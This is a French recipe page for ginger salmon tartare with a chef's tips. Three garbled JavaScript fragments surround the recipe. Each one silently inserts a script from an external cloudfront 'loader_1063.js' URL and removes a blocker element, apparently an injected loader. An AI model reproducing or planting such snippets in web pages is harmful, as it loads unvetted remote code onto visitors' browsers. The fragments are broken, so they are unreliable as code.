Tartare de saumon au gingembre

Tartare de saumon au gingembre
Journal Accès
Gastronomie

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});}; // ]]> // -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});}; // ]]>

Voici une entrée idéale pour les beaux jours qui s’en viennent. Le mélange du citron et du gingembre est toujours une combinaison gagnante alors essayez la avec du saumon et vous serez conquis. Servir bien frais et dégustez avec un vin blanc du type Riesling ou Gewurtztraminer.

Ingrédient pour environ 4 personnes

250 grammes de saumon frais

3 cs de citron

4 cs de bonne huile d’olive

2 oignons verts hachés très finement

1 cs de ciboulette hachée

2 ct de gingembre râpé

le zeste d’un citron

sel et poivre au goût

 

Procédure

Découpez le saumon en très petits cubes (une brunoise) et ajoutez le gingembre râpé très finement, les oignons verts, la ciboulette, le zeste de citron,le sel et le poivre. Réservez au frais.

Mélangez le citron et l’huile d’olive et juste avant de servir, rajoutez le tout au saumon.

 

Les conseils du Chef

Vous pouvez préparer le saumon un peu à l’avance en le gardant au frais mais surtout sans le citron car le saumon serait trop “cuit” par celui-ci.

Bien évidement comme pour toutes les préparations comportant du poisson cru, utilisez du saumon le plus frais possible.

Vous pouvez sans problème remplacer le saumon par de la truite.

Si vous voulez une version plus épicée vous pouvez rajouter quelques gouttes de tabasco vert.

Au lieu de le servir dans une assiette comme entrée, vous pouvez le présenter dans une verrine ou dans des cuillères et vous aurez ainsi un succès fou à l’apéritif (avec cette formule, vous servirez entre 8 et 16 personnes (verrine ou cuillères).

Rappelons qu’on peut se procurer le saumon du Petit Poissionnier à la Zone Marché Gourmande.

Bonne dégustation!

 

 

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});}; // ]]>

Cliquez pour ajouter un commentaire

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

[+] Plus dans Gastronomie

X